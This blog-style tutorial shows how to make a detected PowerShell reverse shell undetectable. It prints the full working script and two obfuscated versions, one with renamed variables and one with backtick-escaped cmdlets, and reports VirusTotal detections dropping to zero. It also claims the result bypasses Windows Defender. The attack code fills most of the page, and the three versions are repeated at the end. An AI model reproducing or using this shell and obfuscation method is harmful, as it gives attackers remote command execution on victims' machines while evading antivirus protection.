From Detected to Undetected

Introduction

It's a boring weekend, and it's so cold outdoors. So let's play a little bit with VirusTotal.

What we are going to do right now is to take a detected sample of the antivirus and make it undetectable.

VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user's own antivirus may have missed or verified against any false positives. Antivirus software vendors can receive copies of files flagged by other scans but passed by their own engine to help improve their software.

Malicious Sample

Our sample choice is "PowerShell reverse shell.", coded by Nikhil Mittal.

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2  = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()}
$client.Close()

First, let’s check our sample with VirusTotal for first time before doing anything.

VirusTotal’s result showed that 18 security vendors detected it. Let’s play now.

Playtime

The easiest thing we can do first. It is changing the names of the variables with random names.

$Melia = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (iex $Hekate 2>&1 | Out-String )
$Tyr2  = $Tyr + "PS " + (pwd).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()

Let’s scan again now with our friend.

Fourteen security vendors were flagged as malicious on VirusTotal. Hmm, there is progress! With a few changes, we bypassed four vendors. Let's continue.

If we go to details in VirusTotal’s report, we will find the “Powershell Info” section. We will see that VirusTotal identifies the cmdlets used in our script.

The magic of `

Let's try to add backtick between the commands. Then we'll see if VirusTotal can catch it or not.

PowerShell supports a set of special character sequences that are used to represent characters that aren't part of the standard character set. The sequences are commonly known as escape sequences.
Escape sequences begin with the backtick character, known as the grave accent (ASCII 96), and are case-sensitive. The backtick character can also be referred to as the escape character.
Escape sequences are only interpreted when contained in double-quoted (") strings.

Sequence

Description

Null

Alert

Backspace

Escape

Form feed

New line

Carriage return

Horizontal tab

`u{x}

Unicode escape sequence

Vertical tab

So, we must be wary of where we set the backtick. We don't want to break our commands.

When we escape, "a" with backtick means alert PowerShell (who`ami), and when we escape "f" with backtick means form feed (ipcon`fig), so both commands break. And when we escape the other character, commands don't break because then characters do not render the special meaning.

To make the picture clear to you. See the following image.

Let's continue and add backtick to our code.

$Melia = nEW`-oBj`ECt System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (nEW`-oBj`ECt -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (I`Ex $Hekate 2>&1 | ouT`-St`RINg )
$Tyr2  = $Tyr + "PS " + (P`w`d).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()

Upload it to VirusTotal again and scan it.

Really, I'm disappointed! We want to play more, but "No security vendors and no sandboxes flagged this file as malicious.”

As shown in the result. VirusTotal does not detect cmdlets that are used in our script! The backtick was helpful.

Test Time

It's time to test our code to bypass Windows Defender and get a reverse shell. To make sure everything is working correctly.

It works fine.

Closing Words

Sometimes, we may not need much to do to avoid antivirus software! We could bypass all the antivirus software by changing the variable names and adding some backtick to the code like what you saw before.

Last updated 3 years ago

Was this helpful?

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443) $stream = $client.GetStream() [byte[]]$bytes = 0..255|%{0} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i) $sendback = (iex $data 2>&1 | Out-String ) $sendback2 = $sendback + "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush()} $client.Close()

$Melia = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443) $Plouton = $Melia.GetStream() [byte[]]$bytes = 0..255|%{0} while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){ $Hekate = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i) $Tyr = (iex $Hekate 2>&1 | Out-String ) $Tyr2 = $Tyr + "PS " + (pwd).Path + "> " $Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2) $Plouton.Write($Lucretia,0,$Lucretia.Length) $Plouton.Flush()} $Melia.Close()

$Melia = nEW`-oBj`ECt System.Net.Sockets.TCPClient("127.0.0.1",443) $Plouton = $Melia.GetStream() [byte[]]$bytes = 0..255|%{0} while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){ $Hekate = (nEW`-oBj`ECt -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i) $Tyr = (I`Ex $Hekate 2>&1 | ouT`-St`RINg ) $Tyr2 = $Tyr + "PS " + (P`w`d).Path + "> " $Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2) $Plouton.Write($Lucretia,0,$Lucretia.Length) $Plouton.Flush()} $Melia.Close()